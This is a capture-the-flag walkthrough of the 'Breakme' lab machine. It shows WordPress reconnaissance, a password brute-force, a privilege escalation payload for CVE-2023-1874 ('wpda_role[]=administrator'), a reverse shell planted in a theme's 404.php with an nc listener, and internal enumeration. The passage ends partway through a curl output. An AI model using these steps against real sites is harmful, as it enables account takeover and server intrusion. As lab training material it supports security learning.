# Breakme {% embed url="" %} ## Recon Let's start with a nmap scan. {% code overflow="wrap" %} ```bash ┌──(kali㉿kali)-[~] └─$ nmap breakme.thm Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-07 11:14 IST Nmap scan report for breakme.thm (10.10.221.241) Host is up (0.14s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds ┌──(kali㉿kali)-[~] └─$ nmap -sC -sV -p 22,80 breakme.thm -T4 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-07 11:21 IST Nmap scan report for breakme.thm (10.10.221.241) Host is up (0.14s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 8e:4f:77:7f:f6:aa:6a:dc:17:c9:bf:5a:2b:eb:8c:41 (RSA) | 256 a3:9c:66:73:fc:b9:23:c0:0f:da:1d:c9:84:d6:b1:4a (ECDSA) |_ 256 6d:c2:0e:89:25:55:10:a9:9e:41:6e:0d:81:9a:17:cb (ED25519) 80/tcp open http Apache httpd 2.4.56 ((Debian)) |_http-server-header: Apache/2.4.56 (Debian) |_http-title: Apache2 Debian Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.18 seconds ``` {% endcode %} We use Ferroxbuster for a directory scan. It’s evident that the web server in question is operating WordPress. ```bash ┌──(kali㉿kali)-[~] └─$ feroxbuster -u http://breakme.thm/ -w /usr/share/wordlists/dirb/big.txt ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben "epi" Risher 🤓 ver: 2.10.3 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://breakme.thm/ 🚀 Threads │ 50 📖 Wordlist │ /usr/share/wordlists/dirb/big.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.10.3 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 403 GET 9l 28w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 404 GET 9l 31w 273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 200 GET 24l 126w 10355c http://breakme.thm/icons/openlogo-75.png 200 GET 368l 933w 10701c http://breakme.thm/ 301 GET 9l 28w 311c http://breakme.thm/manual => http://breakme.thm/manual/ 301 GET 9l 28w 314c http://breakme.thm/manual/da => http://breakme.thm/manual/da/ 301 GET 9l 28w 314c http://breakme.thm/manual/en => http://breakme.thm/manual/en/ 301 GET 9l 28w 314c http://breakme.thm/manual/de => http://breakme.thm/manual/de/ 301 GET 9l 28w 314c http://breakme.thm/manual/es => http://breakme.thm/manual/es/ 301 GET 9l 28w 318c http://breakme.thm/manual/images => http://breakme.thm/manual/images/ 200 GET 3l 26w 3083c http://breakme.thm/manual/images/mod_rewrite_fig1.png 200 GET 1l 5w 87c http://breakme.thm/manual/images/right.gif 200 GET 10l 34w 2420c http://breakme.thm/manual/images/mod_rewrite_fig2.png 200 GET 18l 118w 6536c http://breakme.thm/manual/images/feather.gif 200 GET 1l 5w 84c http://breakme.thm/manual/images/down.gif 200 GET 14l 54w 2412c http://breakme.thm/manual/images/index.gif 200 GET 25l 87w 6358c http://breakme.thm/manual/images/mod_rewrite_fig1.gif 200 GET 16l 74w 5983c http://breakme.thm/manual/images/ssl_intro_fig1.png 200 GET 8l 24w 1868c http://breakme.thm/manual/images/mod_filter_new.png 200 GET 26l 111w 10616c http://breakme.thm/manual/images/ssl_intro_fig1.gif 200 GET 50l 355w 31098c http://breakme.thm/manual/images/custom_errordocs.png 200 GET 105l 493w 29291c http://breakme.thm/manual/images/caching_fig1.gif 301 GET 9l 28w 314c http://breakme.thm/manual/fr => http://breakme.thm/manual/fr/ 200 GET 158l 1179w 92140c http://breakme.thm/manual/images/build_a_mod_3.png 200 GET 931l 5534w 463351c http://breakme.thm/manual/images/bal-man.png 301 GET 9l 28w 314c http://breakme.thm/manual/ja => http://breakme.thm/manual/ja/ 301 GET 9l 28w 314c http://breakme.thm/manual/ko => http://breakme.thm/manual/ko/ 301 GET 9l 28w 324c http://breakme.thm/manual/da/developer => http://breakme.thm/manual/da/developer/ 301 GET 9l 28w 318c http://breakme.thm/manual/da/faq => http://breakme.thm/manual/da/faq/ 301 GET 9l 28w 324c http://breakme.thm/manual/en/developer => http://breakme.thm/manual/en/developer/ 301 GET 9l 28w 324c http://breakme.thm/manual/de/developer => http://breakme.thm/manual/de/developer/ 301 GET 9l 28w 324c http://breakme.thm/manual/es/developer => http://breakme.thm/manual/es/developer/ 301 GET 9l 28w 317c http://breakme.thm/manual/pt-br => http://breakme.thm/manual/pt-br/ 301 GET 9l 28w 320c http://breakme.thm/manual/da/howto => http://breakme.thm/manual/da/howto/ 301 GET 9l 28w 324c http://breakme.thm/manual/ja/developer => http://breakme.thm/manual/ja/developer/ 301 GET 9l 28w 314c http://breakme.thm/manual/ru => http://breakme.thm/manual/ru/ 301 GET 9l 28w 318c http://breakme.thm/manual/es/faq => http://breakme.thm/manual/es/faq/ 301 GET 9l 28w 318c http://breakme.thm/manual/de/faq => http://breakme.thm/manual/de/faq/ 301 GET 9l 28w 317c http://breakme.thm/manual/style => http://breakme.thm/manual/style/ 200 GET 42l 190w 1425c http://breakme.thm/manual/style/sitemap.dtd 200 GET 24l 127w 907c http://breakme.thm/manual/style/lang.dtd 301 GET 9l 28w 320c http://breakme.thm/manual/en/howto => http://breakme.thm/manual/en/howto/ 200 GET 1622l 6889w 73959c http://breakme.thm/manual/style/scripts/prettify.js 200 GET 5l 21w 167c http://breakme.thm/manual/style/scripts/MINIFY 301 GET 9l 28w 320c http://breakme.thm/manual/es/howto => http://breakme.thm/manual/es/howto/ 301 GET 9l 28w 320c http://breakme.thm/manual/de/howto => http://breakme.thm/manual/de/howto/ 301 GET 9l 28w 314c http://breakme.thm/manual/tr => http://breakme.thm/manual/tr/ 301 GET 9l 28w 314c http://breakme.thm/wordpress => http://breakme.thm/wordpress/ 301 GET 9l 28w 324c http://breakme.thm/manual/ko/developer => http://breakme.thm/manual/ko/developer/ 301 GET 9l 28w 319c http://breakme.thm/manual/da/misc => http://breakme.thm/manual/da/misc/ 301 GET 9l 28w 320c http://breakme.thm/manual/ja/howto => http://breakme.thm/manual/ja/howto/ 301 GET 9l 28w 318c http://breakme.thm/manual/da/mod => http://breakme.thm/manual/da/mod/ 301 GET 9l 28w 318c http://breakme.thm/manual/ko/faq => http://breakme.thm/manual/ko/faq/ 301 GET 9l 28w 320c http://breakme.thm/manual/fr/howto => http://breakme.thm/manual/fr/howto/ 301 GET 9l 28w 317c http://breakme.thm/manual/zh-cn => http://breakme.thm/manual/zh-cn/ 301 GET 9l 28w 319c http://breakme.thm/manual/en/misc => http://breakme.thm/manual/en/misc/ 301 GET 9l 28w 319c http://breakme.thm/manual/es/misc => http://breakme.thm/manual/es/misc/ 301 GET 9l 28w 318c http://breakme.thm/manual/en/mod => http://breakme.thm/manual/en/mod/ 301 GET 9l 28w 323c http://breakme.thm/manual/da/platform => http://breakme.thm/manual/da/platform/ 301 GET 9l 28w 323c http://breakme.thm/manual/da/programs => http://breakme.thm/manual/da/programs/ 301 GET 9l 28w 319c http://breakme.thm/manual/de/misc => http://breakme.thm/manual/de/misc/ 301 GET 9l 28w 318c http://breakme.thm/manual/es/mod => http://breakme.thm/manual/es/mod/ 301 GET 9l 28w 321c http://breakme.thm/manual/es/vhosts => http://breakme.thm/manual/es/vhosts/ 301 GET 9l 28w 324c http://breakme.thm/manual/tr/developer => http://breakme.thm/manual/tr/developer/ 301 GET 9l 28w 325c http://breakme.thm/wordpress/wp-content => http://breakme.thm/wordpress/wp-content/ 301 GET 9l 28w 323c http://breakme.thm/wordpress/wp-admin => http://breakme.thm/wordpress/wp-admin/ 301 GET 9l 28w 326c http://breakme.thm/wordpress/wp-includes => http://breakme.thm/wordpress/wp-includes/ 301 GET 9l 28w 333c http://breakme.thm/wordpress/wp-includes/assets => http://breakme.thm/wordpress/wp-includes/assets/ 301 GET 9l 28w 333c http://breakme.thm/wordpress/wp-includes/blocks => http://breakme.thm/wordpress/wp-includes/blocks/ 301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/certificates => http://breakme.thm/wordpress/wp-includes/certificates/ 301 GET 9l 28w 327c http://breakme.thm/wordpress/wp-admin/css => http://breakme.thm/wordpress/wp-admin/css/ 301 GET 9l 28w 330c http://breakme.thm/wordpress/wp-includes/css => http://breakme.thm/wordpress/wp-includes/css/ 301 GET 9l 28w 336c http://breakme.thm/wordpress/wp-includes/customize => http://breakme.thm/wordpress/wp-includes/customize/ 301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/audio => http://breakme.thm/wordpress/wp-includes/blocks/audio/ 301 GET 9l 28w 342c http://breakme.thm/wordpress/wp-includes/blocks/archives => http://breakme.thm/wordpress/wp-includes/blocks/archives/ 301 GET 9l 28w 340c http://breakme.thm/wordpress/wp-includes/blocks/avatar => http://breakme.thm/wordpress/wp-includes/blocks/avatar/ 301 GET 9l 28w 340c http://breakme.thm/wordpress/wp-includes/blocks/button => http://breakme.thm/wordpress/wp-includes/blocks/button/ 301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/buttons => http://breakme.thm/wordpress/wp-includes/blocks/buttons/ 301 GET 9l 28w 342c http://breakme.thm/wordpress/wp-includes/blocks/calendar => http://breakme.thm/wordpress/wp-includes/blocks/calendar/ 301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/block => http://breakme.thm/wordpress/wp-includes/blocks/block/ 301 GET 9l 28w 344c http://breakme.thm/wordpress/wp-includes/blocks/categories => http://breakme.thm/wordpress/wp-includes/blocks/categories/ 301 GET 9l 28w 330c http://breakme.thm/wordpress/wp-admin/images => http://breakme.thm/wordpress/wp-admin/images/ 301 GET 9l 28w 326c http://breakme.thm/wordpress/wp-admin/js => http://breakme.thm/wordpress/wp-admin/js/ 301 GET 9l 28w 332c http://breakme.thm/wordpress/wp-admin/includes => http://breakme.thm/wordpress/wp-admin/includes/ 301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/blocks/code => http://breakme.thm/wordpress/wp-includes/blocks/code/ 301 GET 9l 28w 333c http://breakme.thm/wordpress/wp-includes/images => http://breakme.thm/wordpress/wp-includes/images/ 301 GET 9l 28w 340c http://breakme.thm/wordpress/wp-includes/blocks/column => http://breakme.thm/wordpress/wp-includes/blocks/column/ 301 GET 9l 28w 342c http://breakme.thm/wordpress/wp-includes/blocks/comments => http://breakme.thm/wordpress/wp-includes/blocks/comments/ 301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/columns => http://breakme.thm/wordpress/wp-includes/blocks/columns/ 301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/cover => http://breakme.thm/wordpress/wp-includes/blocks/cover/ 301 GET 9l 28w 329c http://breakme.thm/wordpress/wp-includes/js => http://breakme.thm/wordpress/wp-includes/js/ 301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/details => http://breakme.thm/wordpress/wp-includes/blocks/details/ 301 GET 9l 28w 329c http://breakme.thm/wordpress/wp-admin/maint => http://breakme.thm/wordpress/wp-admin/maint/ 301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/embed => http://breakme.thm/wordpress/wp-includes/blocks/embed/ 301 GET 9l 28w 334c http://breakme.thm/wordpress/wp-admin/css/colors => http://breakme.thm/wordpress/wp-admin/css/colors/ 301 GET 9l 28w 331c http://breakme.thm/wordpress/wp-admin/network => http://breakme.thm/wordpress/wp-admin/network/ 301 GET 9l 28w 335c http://breakme.thm/wordpress/wp-includes/css/dist => http://breakme.thm/wordpress/wp-includes/css/dist/ 301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/blocks/file => http://breakme.thm/wordpress/wp-includes/blocks/file/ 301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/gallery => http://breakme.thm/wordpress/wp-includes/blocks/gallery/ 301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/group => http://breakme.thm/wordpress/wp-includes/blocks/group/ 301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/heading => http://breakme.thm/wordpress/wp-includes/blocks/heading/ 301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/blocks/html => http://breakme.thm/wordpress/wp-includes/blocks/html/ 301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/image => http://breakme.thm/wordpress/wp-includes/blocks/image/ 301 GET 9l 28w 333c http://breakme.thm/wordpress/wp-content/plugins => http://breakme.thm/wordpress/wp-content/plugins/ 301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/blocks/list => http://breakme.thm/wordpress/wp-includes/blocks/list/ 301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/images/crystal => http://breakme.thm/wordpress/wp-includes/images/crystal/ 301 GET 9l 28w 335c http://breakme.thm/wordpress/wp-includes/sitemaps => http://breakme.thm/wordpress/wp-includes/sitemaps/ 301 GET 9l 28w 334c http://breakme.thm/wordpress/wp-includes/js/dist => http://breakme.thm/wordpress/wp-includes/js/dist/ 301 GET 9l 28w 334c http://breakme.thm/wordpress/wp-includes/js/crop => http://breakme.thm/wordpress/wp-includes/js/crop/ 301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/missing => http://breakme.thm/wordpress/wp-includes/blocks/missing/ 301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/blocks/more => http://breakme.thm/wordpress/wp-includes/blocks/more/ 301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-content/plugins/akismet => http://breakme.thm/wordpress/wp-content/plugins/akismet/ 301 GET 9l 28w 328c http://breakme.thm/wordpress/wp-admin/user => http://breakme.thm/wordpress/wp-admin/user/ 301 GET 9l 28w 344c http://breakme.thm/wordpress/wp-includes/blocks/navigation => http://breakme.thm/wordpress/wp-includes/blocks/navigation/ 301 GET 9l 28w 332c http://breakme.thm/wordpress/wp-content/themes => http://breakme.thm/wordpress/wp-content/themes/ 301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/query => http://breakme.thm/wordpress/wp-includes/blocks/query/ 301 GET 9l 28w 340c http://breakme.thm/wordpress/wp-includes/blocks/spacer => http://breakme.thm/wordpress/wp-includes/blocks/spacer/ 301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/images/smilies => http://breakme.thm/wordpress/wp-includes/images/smilies/ 301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/js/swfupload => http://breakme.thm/wordpress/wp-includes/js/swfupload/ 301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/js/thickbox => http://breakme.thm/wordpress/wp-includes/js/thickbox/ 301 GET 9l 28w 337c http://breakme.thm/wordpress/wp-includes/js/tinymce => http://breakme.thm/wordpress/wp-includes/js/tinymce/ 301 GET 9l 28w 345c http://breakme.thm/wordpress/wp-includes/sitemaps/providers => http://breakme.thm/wordpress/wp-includes/sitemaps/providers/ 301 GET 9l 28w 334c http://breakme.thm/wordpress/wp-admin/js/widgets => http://breakme.thm/wordpress/wp-admin/js/widgets/ ``` Visiting the index page, we are just greeted with an Apache2 Debian default page. \ ![](/files/qw8S7WPwg6px9sqmxg2a) We visit the WordPress site and discover that it is a straightforward blog. {% code overflow="wrap" fullWidth="false" %} ``` http://breakme.thm/wordpress/ ``` {% endcode %}
We seem to be in the right place `http://breakme.thm/wordpress/index.php/breakme/.`
Next, we use WPScan to analyze the WordPress application. It reveals that the site is running version 6.4.3, which contains a vulnerability allowing user enumeration. {% code overflow="wrap" %} ```bash ┌──(kali㉿kali)-[~] └─$ wpscan --url http://breakme.thm/wordpress/ _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.25 @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] Updating the Database ... [i] Update completed. [+] URL: http://breakme.thm/wordpress/ [10.10.221.241] [+] Started: Mon Oct 7 12:17:29 2024 . . . . [+] WordPress version 6.4.3 identified (Insecure, released on 2024-01-30). | Found By: Rss Generator (Passive Detection) | - http://breakme.thm/wordpress/index.php/feed/, https://wordpress.org/?v=6.4.3 | - http://breakme.thm/wordpress/index.php/comments/feed/, https://wordpress.org/?v=6.4.3 [+] WordPress theme in use: twentytwentyfour | Location: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/ | Last Updated: 2024-07-16T00:00:00.000Z | Readme: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/readme.txt | [!] The version is out of date, the latest version is 1.2 | Style URL: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css | Style Name: Twenty Twenty-Four | Style URI: https://wordpress.org/themes/twentytwentyfour/ | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti... | Author: the WordPress team | Author URI: https://wordpress.org | | Found By: Urls In Homepage (Passive Detection) | | Version: 1.0 (80% confidence) | Found By: Style (Passive Detection) | - http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0' ``` {% endcode %} ## Initial Access We continue focusing on the WordPress site and run additional WPScan assessments to extract more useful information. These scans help identify potential vulnerabilities that could be exploited. ### WPScan Part I - Enum Credentials We begin by attempting to enumerate existing users on the WordPress site. Through this process, we successfully identify two users: `bob` and `admin`. {% code overflow="wrap" %} ```bash ┌──(kali㉿kali)-[~] └─$ wpscan --url http://breakme.thm/wordpress/ --enumerate u _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.25 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://breakme.thm/wordpress/ [10.10.221.241] [+] Started: Mon Oct 7 12:29:14 2024 . . . [i] User(s) Identified: [+] admin | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Wp Json Api (Aggressive Detection) | - http://breakme.thm/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] bob | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) ``` {% endcode %} Next, we proceed to brute-force the passwords for both users. We manage to successfully crack the password for user `bob`. {% code overflow="wrap" %} ```bash ┌──(kali㉿kali)-[~] └─$ wpscan --url http://breakme.thm/wordpress/ -U admin,bob -P /usr/share/wordlists/rockyou.txt _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.25 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://breakme.thm/wordpress/ [10.10.221.241] [+] Started: Mon Oct 7 12:31:09 2024 . . . . [+] Performing password attack on Wp Login against 2 user/s [SUCCESS] - bob / soccer ^Cying admin / 121589 Time: 00:20:10 < > (18419 / 28688814) 0.06% ETA: ??:??:?? [!] Valid Combinations Found: | Username: bob, Password: [REDACTED] ``` {% endcode %} A link in the sample page `http://breakme.thm/wordpress/index.php/sample-page` takes us to the login window.
We log in using the discovered credentials but realize that the account doesn't have elevated privileges. The admin dashboard is not visible, indicating this user has limited permissions.
We can make changes to our profile and are able to make minor adjustments at the dashboard.
### WPSan Part II - Further Enumeration (WPScan API Key) It looks like we haven't discovered everything yet. Next we run another WPScan, this time with an API key. This can be obtained free of charge after registering on the next page of WPScan. This will allow us to get our results associated with CVEs. We run the WPScan using the API key and discover an interesting finding that belongs to `CVE-2023-1874`, which is WP Data Access <= 5.3.7 - Authenticated (Subscriber+) Privilege Escalation. ```bash ┌──(kali㉿kali)-[~] └─$ export WPSCAN_API_TOKEN=[REDACTED] ┌──(kali㉿kali)-[~] └─$ wpscan --url http://breakme.thm/wordpress/ _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.25 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://breakme.thm/wordpress/ [10.10.221.241] [+] Started: Mon Oct 7 12:53:11 2024 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.56 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://breakme.thm/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://breakme.thm/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://breakme.thm/wordpress/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 6.4.3 identified (Insecure, released on 2024-01-30). | Found By: Rss Generator (Passive Detection) | - http://breakme.thm/wordpress/index.php/feed/, https://wordpress.org/?v=6.4.3 | - http://breakme.thm/wordpress/index.php/comments/feed/, https://wordpress.org/?v=6.4.3 | | [!] 4 vulnerabilities identified: | | [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS | Fixed in: 6.4.4 | References: | - https://wpscan.com/vulnerability/1a5c5df1-57ee-4190-a336-b0266962078f | - https://wordpress.org/news/2024/04/wordpress-6-5-2-maintenance-and-security-release/ | | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API | Fixed in: 6.4.5 | References: | - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28 | - https://wordpress.org/news/2024/06/wordpress-6-5-5/ | | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block | Fixed in: 6.4.5 | References: | - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb | - https://wordpress.org/news/2024/06/wordpress-6-5-5/ | | [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block | Fixed in: 6.4.5 | References: | - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c | - https://wordpress.org/news/2024/06/wordpress-6-5-5/ [+] WordPress theme in use: twentytwentyfour | Location: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/ | Last Updated: 2024-07-16T00:00:00.000Z | Readme: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/readme.txt | [!] The version is out of date, the latest version is 1.2 | Style URL: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css | Style Name: Twenty Twenty-Four | Style URI: https://wordpress.org/themes/twentytwentyfour/ | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti... | Author: the WordPress team | Author URI: https://wordpress.org | | Found By: Urls In Homepage (Passive Detection) | | Version: 1.0 (80% confidence) | Found By: Style (Passive Detection) | - http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0' [+] Enumerating All Plugins (via Passive Methods) [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] wp-data-access | Location: http://breakme.thm/wordpress/wp-content/plugins/wp-data-access/ | Last Updated: 2024-09-18T00:01:00.000Z | [!] The version is out of date, the latest version is 5.5.14 | | Found By: Urls In Homepage (Passive Detection) | | [!] 3 vulnerabilities identified: | | [!] Title: WP Data Access < 5.3.8 - Subscriber+ Privilege Escalation | Fixed in: 5.3.8 | References: | - https://wpscan.com/vulnerability/7871b890-5172-40aa-88f2-a1b95e240ad4 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1874 | - https://www.wordfence.com/blog/2023/04/privilege-escalation-vulnerability-patched-promptly-in-wp-data-access-wordpress-plugin/ | | [!] Title: Freemius SDK < 2.5.10 - Reflected Cross-Site Scripting | Fixed in: 5.3.11 | References: | - https://wpscan.com/vulnerability/39d1f22f-ea34-4d94-9dc2-12661cf69d36 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33999 | | [!] Title: WP Data Access < 5.5.9 - Cross-Site Request Forgery | Fixed in: 5.5.9 | References: | - https://wpscan.com/vulnerability/4fe0d330-6511-4500-ac3f-b9bb944b8f0e | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43295 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/85a33508-71f2-4aa1-8d51-667eb0690fbd | | Version: 5.3.5 (80% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://breakme.thm/wordpress/wp-content/plugins/wp-data-access/readme.txt [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:05 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:05 [i] No Config Backups Found. [+] WPScan DB API OK | Plan: free | Requests Done (during the scan): 3 | Requests Remaining: 22 [+] Finished: Mon Oct 7 12:53:26 2024 [+] Requests Done: 176 [+] Cached Requests: 5 [+] Data Sent: 47.983 KB [+] Data Received: 311.351 KB [+] Memory used: 273.23 MB [+] Elapsed time: 00:00:14 ``` We can find out more about the vulnerability in the following post: {% embed url="" %} So we update our profile first.
We submit the request and intercept it via Burp Suite. We must now add the following parameter, which is not already set. `&wpda_role[]=administrator` We assign ourselves the administrator role. However, if we make an error with the parameter and input it incorrectly, we risk being locked out and losing access to the dashboard, requiring a machine restart to regain access.
### Reverse Shell To establish a foothold, we leverage our elevated privileges to create a reverse shell. Following guidance from Hacktricks, we modify a template page's content with a reverse shell script, utilizing `revshells.com` to generate a suitable Pentest Monkey reverse shell. We ensure this process runs in the background while setting up a listener to catch the incoming connection. {% embed url="" %}
Next, we reach out to the following Page to update a template for a reverse shell. ``` http://breakme.thm/wordpress/wp-admin/theme-editor.php ``` Here we first set the template to `Twenty-Twenty One`, because this has a PHP template for the `404` page. We select this and then replace everything with the reverse shell content and then update the file.
Now we only need to call up our edited page with the following URL: [`http://breakme.thm/wordpress/wp-content/themes/twentytwentyone/404.php`](http://breakme.thm/wordpress/wp-content/themes/twentytwentyone/404.php) We then get a reverse shell on our listener and upgrade our shell. We are `www-data`, but don't have access to the first flag for the time being. ``` ┌──(kali㉿kali)-[~] └─$ nc -lvnp 1337 listening on [any] 1337 ... connect to [10.17.15.155] from (UNKNOWN) [10.10.221.241] 43952 Linux Breakme 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64 GNU/Linux 03:49:00 up 2:18, 0 users, load average: 0.00, 0.00, 0.11 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) bash: cannot set terminal process group (616): Inappropriate ioctl for device bash: no job control in this shell www-data@Breakme:/$ ``` First. Let's upgrade this shell. {% embed url="" %} We transfer linpeas to the machine and run it.
After our Linpeas scan we find access possibilities to files of other users `john` and `youcef`.
We find the first flag in john's home directory, but have no access to it. We may have to get access to user `john`. ## Reverse Shell as john When enurering using www-data, we detect an internal service running on port 9999. ```bash www-data@Breakme:/home/john$ netstat -tulnp (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:9999 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - udp 0 0 0.0.0.0:68 0.0.0.0:* - ``` This seems to be another site, possibly an entry point to user `john`. ```bash www-data@Breakme:/tmp$ curl 127.0.0.1:9999 Test

My Tools:

Check Target:






Result:



        

        

                
Check User:

                


                



                
Result:


                

        

        

                
Check File:

                


